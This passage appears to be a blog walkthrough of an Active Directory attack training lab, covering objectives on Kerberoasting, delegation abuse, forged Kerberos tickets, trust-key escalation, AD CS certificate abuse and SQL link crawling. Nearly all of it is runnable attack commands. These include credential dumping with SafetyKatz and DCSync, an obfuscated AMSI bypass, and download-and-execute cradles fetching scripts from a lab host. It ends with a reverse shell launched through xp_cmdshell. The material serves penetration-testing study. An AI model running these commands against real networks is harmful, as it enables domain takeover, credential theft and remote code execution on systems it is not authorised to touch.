Now we can execute WMI queries on the DC as student520

1
gwmi -class win32_operatingsystem -ComputerName dcorp-dc

Similar modifications can be done to PowerShell remoting configuration:

1
2
3
. C:\AD\Tools\RACE.ps1

Set-RemotePSRemoting -SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

And now we can run commands using powershell remoting on the DC without DA privileges

1
Invoke-Command -ScriptBlock{whoami} -ComputerName dcorpdc.dollarcorp.moneycorp.local

To retrieve machine account hash without DA, first we need to modify permissions on the DC by running this command as DA:

1
2
3
 . C:\AD\Tools\RACE.ps1

 Add-RemoteRegBackdoor -ComputerName dcorpdc.dollarcorp.moneycorp.local -Trustee student520 -Verbose

Then we can retrieve the hash as the student520 user with

1
2
3
. C:\AD\Tools\RACE.ps1

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

The machine account hash can be used to create silver tickets for HOST and RPCSS to execute WMI queries:

1
2
3
4
5
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1be12164a06b817e834eb437dc8f581c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"



C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:1be12164a06b817e834eb437dc8f581c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

then

1
2
3
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

gwmi -Class win32_operatingsystem -ComputerName dcorp-dc

Learning Objective 14

the task in this objective is using Kerberoasting, get and crack the password of the SQL server service account.

We can use PowerView’s Get-DomainUser -SPN or AD module for discovering services running with user accounts, as services running with machine accounts have difficult passwords.

1
2
3
4
5
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Get-DomainUser -SPN

Which shows in this lab that the svcadmin, who is a DA, has an SPN set which we can kerberoast with rubeus. Note we are using the /rc4opsec option which will only retrieve hashes for accounts that support rc4, if the account supports kerberos AES 128/256 bit encrption, the below command will not request its hashes.

1
C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

Then you need to remove :1433 from the SPN in hashes.txt (output file of previous command) before running john, then run the below command to crack it.

1
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

Learning Objective 15

Objectives: find a server in the dcorp domain where unconstrained delegation is enabled, comrpromise the server and escalate to DA, escalate to EA by abusing the printer bug.

First we will need to find a server that has unconstrained delegation enabled

1
2
3
4
5
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name

Since the prerequiside for elevation using unconstrained delegation is having admin access to the machine, we need to compromise a user who has local admin access on appsrv. Recall that we extracted the secrets of appadmin, srvadmin, and websvc from dcorp-adminsrv. Let’s check if any of them have local admin on dcorp-appsrv. Run the below command from an elevated command prompt:

1
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:appadmin /domain:dollarcorp.moneycorp.local /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /run:cmd.exe" "exit

Then run the below commands in the new process:

1
2
3
4
5
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess

And we can see that we have remote local admin access on dcorp-appsrv and dcorp-adminsrv with the appadmin user. We can copy rubeus to the dcorp-appsrv to abuse the printer bug. Run the below from the process running as appadmin:

1
echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorp-appsrv\C$\Users\Public\Rubeus.exe /Y

Then run rubeus in Listener mode

1
2
3
winrs -r:dcorp-appsrv cmd

C:\Users\Public\Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

On our student VM, use MS-RPRN to force authentication from the dc

1
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

On the Rubeus listener, you should see the TGT of dcorp-dc$. Copy the base64 encoded ticket and use it with rubeus on the studentvm, run the below command from an elevated shell as the safetykatz command we will use requires elevation.

1
C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx

Now we can run DCSync from this process:

1
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Escalation to Enterprise Admin

To get EA privileges, we need to force authentication from mcorp-dc. Run the below command to listen for mcorp-dc$ tickets on the dcorp-appsrv

1
2
3
winrs -r:dcorp-appsrv cmd

C:\Users\Public\Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap

Then use MS-RPRN on the student VM to trigger authentication from mcorp-dc to dcorp-appsrv

1
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorpappsrv.dollarcorp.moneycorp.local

As previously, copy the base64 encoded ticket and use it with Rubeus on the student VM in an elevated shell.

1
C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx...

Now we can run DCSync from the process with

1
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

And we can escalate to EA!

Learning Objective 16

In this objective we will be enumerating users in the domain for whom constrained delegation is enabled, and for such a user we will request a TGT from the DC and obtain a TGS for the service to which delegation is configured, then we will pass the ticket and access the service. In this objective we will also enumerate computer accounts for which constrained delegation is enabled, and request a TGT from the DC, and use the TGS for LDAP service on the target machine, then use the TGS to execute dcsync attack.

To enumerate users with constrained delegation, we can use PowerView, Run the below commands to get started after loading a shell with invisishell:

1
2
3
. C:\AD\Tools\PowerView.ps1

Get-DomainUser -TrustedToAuth

Since we already have the secrets for websvc from the dcorp-adminsrv machine, we can use kekeo or rubeus to abuse that as such:

1
2
C:\AD\Tools\Rubeus.exe s4u /user:websvc
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

This command requests a TGS for websvc as the DA, then the TGS is used to access the service specified in the /msdsspn parameter (CIFS/dcorpmssql is the filesystem on the dcorp-mssql machine)

Check the ticket with klist, and you should see Client: Administrator @ dollarcorp.moneycorp.local. If so, try accessing the filesystem on dcorp-mssql with

1
dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Abusing Constrained Delegation with Kekeo

Go into the x64 keko directory, and we wil use the tgt::ask module from kekeo to request a TGT from websvc, we are using the NTLM hash just to show that NTLM can be used as well.

1
2
3
PS C:\AD\Tools\kekeo\x64> .\kekeo.exe

tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Now let’s get this TGT and request a TGS, note that we are requesting a TGS to access cifs/dcorp-mssql as the domain administrator.

1
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL

You should see

1
2
3
> Ticket in file
'TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs
~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi'

Next, inject the ticket in the current session to use it as such:

1
2
3
. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Then use the below command to view the contents of the fileshare on dcorp-mssql

1
dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Enumerating computer accounts with constrained delegation enabled using powerview

1
Get-DomainComputer -TrustedtoAuth

Run the below command with the AES key of dcorp-adminsrv from an elevated command prompt.

1
C:\AD\Tools\Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:1f556f9d4e5fcab7f1bf4730180eb1efd0fadd5bb1b5c1e810149f9016a7284d /impersonateuser:Administrator  /msdsspn:time/dcorpdc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt

Then run the below command to abuse the LDAP ticket

1
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Abusing Constraied Delegation for Machine Accounts using Kekeo

1
2
3
.\kekeo.exe

tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d

Since there is no $NAME validation, we can request TGS for time and also LDAP service on dcorp-dc as domain administrator as such:

1
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

Then we can use the LDAP ticket as such:

1
2
3
. Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'

Now using this TGS, we can run DCSync from Mimikatz without DA privileges:

1
Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Learning Objective 17

In this objective, we will be finding a computer in the dcorp domain where we have write permissions, then abuse those write permissions to access that computer as DA. We can use PowerView after running invisi-shell to enumerate write permissions for a user that we have compromised. We can try this for multiple users or use bloodhound and we would know that ciadmin has write permissions on the computer object of dcorp-mgmt;

1
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

Recall that we compromised ciadmin from dcorp-ci. We can use either the reverse shell we have on dcorp-ci as ciadmin or extract the credentials from dcorp-ci. We can use the reverse shell and load powerview on there. Once on the reverse shell as ciadmin on dcorp-ci:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
iex (iwr http://172.16.100.20/sbloggingbypass.txt -UseBasicParsing)

 S`eT-It`em ( 'V'+'aR'
+ 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) )
; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
AlteredSecurity Attacking and Defending Active Directory 87
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.20/PowerView.ps1'))

Now, we set RBCD on dcorp-mgmt for the student VMs in the reverse shell as such:

1
2
3
4
5
6
7
Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std520$' -Verbose

and check that it is set correctly with

Get-DomainRBCD

which should spit out some output showing the sourcename dcorp-mgmt and delegatedname dcorp-std520$

from the student VM in an elevated shell, we will get the AES keys using loader.exe to load safetykatz and execute it in memory, then grab the aes256 hmac

1
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::ekeys" "exit"

Then, we can use Rubeus to abuse RBCD to access dcorp-mgmt as DA

1
C:\AD\Tools\Rubeus.exe s4u /user:dcorp-std520$ /aes256:04ec575508fbff957465d31785a6de50d7b3e24a808dc65365f81323d23a11e0 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

Then check if we can access dcorp-mgmt with

1
2
3
4
winrs -r:dcorp-mgmt cmd

whoami
hostname

Learning Objective 18

Using DA access to dollarcorp.moneycorp.local, escalate privileges to EA or DA to the parent domain, moneycorp.local using the domain trust key. We can retreive the trust key between dollarcorp and moneycorp using mimikatz or safetykatz. Start a process with DA privileges by running the below command from an elevated prompt:

1
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then use the below commands from the process running as DA to copy loader.exe on dcorp-dc and use it to extract credentials

1
2
3
4
5
6
7
8
9
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

lsadump::trust /patch

In this case the aes256 hmac for the dollarcorp.moneycorp.local to moneycorp.local trust is 556d040b71b7fc20aa043027b19a3dafc6dbffdb7968966e66200c3f5683e56a and the rc4 is f7277dcaf640d00ddd2744143b346c36

We will use it to forge a ticket with the SID history of EA admins by running the below command from an elevated command prompt on the student VM

1
2
3
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4: f7277dcaf640d00ddd2744143b346c36 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"

if all is good, you should see "Final ticket saved to file !"

We can use rubeus to use this ticket as such

1
C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

Then check if we can access the file system on mcorp-dc as such

1
dir \\mcorp-dc.moneycorp.local\c$

Using Invoke-Mimi and Old Kekeo

starting with the DA process

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
powershell -ep bypass

cd C:\AD\Tools\

$sess = New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Enter-PSSession -Session $sess

S`eTIt`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE](
"{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -
VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

exit

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess

Enter-PSSession -Session $sess

Invoke-Mimi -Command '"lsadump::trust /patch"'

Then create the inter-realm TGT by running the below command on your machine using the rc4_hmac_nt of dollarcorp.moneycorp.local -> moneycorp.local

1
Invoke-Mimi -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:132f54e05f7c3db02e97c00ff3879067 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust2_tkt.kirbi"'

Then, create a TGS for a service in the parent domain (asktgs is in \AD\Tools\kekeo_old)

1
.\asktgs.exe C:\AD\Tools\kekeo_old\trust2_tkt.kirbi CIFS/mcorp-dc.moneycorp.local

Present the TGS to the target service

1
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi

Now try to access the target service, a success means escalation to the parent DA

1
ls \\mcorp-dc.moneycorp.local\c$

Learning Objective 19

Using DA access to dollarcorp.moneycorp.local, escalate privileges to EA or DA to the parent domain, moneycorp.local using dollarcorps krbtgt hash. Let’s create the inter-realm TGT and inject it by running the below command from an elevated command prompt:

1
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

Then check if we can access moneycorp DC

1
dir \\mcorp-dc.moneycorp.local\c$

If we get output, all is good. Let’s run DCSync attack against mcorp-dc to extract it’s secrets:

1
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

Learning Objective 20

With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest. We need the trust key for the trust between dollarcorp and eurocorp, which we can get with mimikatz or safetykatz. Start a process with DA privileges with Rubeus:

1
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Using SafetyKatz.exe

Run the below commands from the process running as DA to copy loader.exe to dcorp-dc and use it to extract the trust key

1
2
3
4
5
6
7
8
9
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

lsadump::trust /patch

Then run the below command from an elevated command prompt using the rc4 hash extracted earlier to create the ticket

1
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:163373571e6c3e09673010fd60accdf0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"

Then use the ticket with Rubeus

1
C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

and check if we have access using

1
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Using Invoke-Mimikatz and old Kekeo

With DA privileges from earlier, run the following command to retrieve the trust key for the trust between dollarcorp and eurocorp

1
Invoke-Mimi -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Create the inter-realm TGT

1
Invoke-Mimi -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:163373571e6c3e09673010fd60accdf0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'

then use asktgs in the kekeo_old directory as such

1
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local

Present the TGS to the CIFS service

1
.\kirbikator.exe lsa .\CIFS.eurocorp-dc.eurocorp.local.kirbi

and check if we have access with

1
ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Learning Objective 21

Check if AD CS is used by the target forest and find any vulnerable or abusable templates, if so then abuse the template to escalate to DA and EA. We can use Certify.exe to check for AD CS in moneycorp.

1
C:\AD\Tools\Certify.exe cas

Then we can list all the templates using the “find” command

1
2
3
C:\AD\Tools\Certify.exe find

C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject

We see the HTTPSCertificates looks interesting, as the msPKI-Certificates-Name-Flag is Enrollee_Supplies_Subject and the enrollment rights contains dcorp/RDPUsers, which we know our student is a member of this group. This means we can request a certificate for any user as the student, we’ll use the below command to request a certificate for a domain admin.

1
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator

Copy all the text between —–BEGIN RSA PRIVATE KEY—– and —–ENDCERTIFICATE—– and save it to esc1.pem. We need to convert it to PFC to use it. We can use the openssl binary on our student VM to do that.

1
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

and enter a password when prompted. Then we can use rubeus to request a TGT for DA administrator.

1
C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt

Check if we have DA privileges

1
winrs -r:dcorp-dc whoami

cool, we can use a similar method to escalate to EA, by requesting a certificate for the EA account

1
C:\AD\Tools\Certify.exe request /ca:mcorpdc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator

And do the same thing shown earlier to extract the key and convert it to PFX

1
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx

Use Rubeus again to request TGT for EA.

1
C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt

and check our access with

1
winrs -r:mcorp-dc whoami

Privilege Escalation to DA and EA using ESC3

If we list vulnerable templates in moneycorp using this command:

1
C:\AD\Tools\Certify.exe find /vulnerable

We can see that the SmartCardEnrollment-Agent template has EKU for Certificate Request Agents, and grants enrollment rights to domain users. If we can find another template that has an EKU that allows for domain authentication and has application policy requirement of the certificate request agent, we can request certs on behalf of any user. use the find command again and look for application policies with the certificate request agent. In this case SmartCardEnrollment-Users has enrollment rights for dcorp\Domain Users.

We can request an enrollment agent certificate from the template “SmartCardEnrollment-Agent”

1
C:\AD\Tools\Certify.exe request /ca:mcorpdc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent

And like earlier, save the certificate to esc3.pem and convert it to pfx and set a password for it.

1
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfx

Then we can use the Enrollment Agent Certificate to request a certificate for DA from the template SmartCardEnrollment-Users

1
C:\AD\Tools\Certify.exe request /ca:mcorpdc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

Once again, save this cert as esc3-DA.pem and convert it to pfx.

``powershell C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-DA.pem -keyex -CSP “Microsoft Enhanced Cryptographic Provider v1.0” -export -out C:\AD\Tools\esc3-DA.pfx

1
2
3
4
5
And use the esc3-DA.pfx created above with Rubeus and request a TGT for DA

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /ptt

Check if we have DA with

1
winrs -r:dcorp-dc whoami

To escalate to Enterprise Admin, we just need to change the request to SmartCardEnrollment-Users template with Rubeus. Note that we are using ‘/onbehalfof: mcorp\administrator’ here

1
C:\AD\Tools\Certify.exe request /ca:mcorpdc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

Once more, convert it to esc3-EA.pfx using openssl and use rubeus

1
2
3
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-EA.pfx

C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-EA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /ptt

Then access mcorp-dc

1
winrs -r:mcorp-dc whoami

Privilege escalation to DA and EA using ESC6

1
C:\AD\Tools\Certify.exe cas

And we are looking for

1
2
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can
specify Subject Alternative Names!

This means we can request a certificate for ANY user from a template that will allow enrollment for normal or low-priv users.

1
C:\AD\Tools\Certify.exe find

And we see again the RDPUsers have Enrollment Rights in the CA-Integration template. As a member of the RDPUsers group, we can request a certificate for any user using CA-Integration template. for EA, use /altname:moneycorp.local\administrator, and for DA use the below command

1
C:\AD\Tools\Certify.exe request /ca:mcorpdc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"CA-Integration" /altname:administrator

Save it to esc6-DA and convert it to pfx using OpenSSL, then use rubeus once again to request a TGT for DA

1
2
3
C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:C:\AD\Tools\esc6-DA.pfx /password:SecretPass@123 /ptt

winrs -r:dcorp-dc whoami

Learning Objective 22

In this objective we get a reverse shell on the SQL server in eurocorp forest by abusing database links from dcorp-mssql. We start with enumerating SQL servers in the domain and see if our student account has privileges to connect to any of them. We can use the PowerUpSQL module as shown below after starting invisishell:

1
2
3
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1

Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

We can then use Get-SQLServerLinkCrawl for crawling database links automatically.

1
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose

If XP_cmdshell is enabled, it is possible to execute commands on eu-sql using linked databases.

1
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'whoami'"

Let’s execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql instance. Remember to start a listener first with

1
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

Then run

1
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.20/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.20/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.20/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql
This post is licensed under CC BY 4.0 by the author.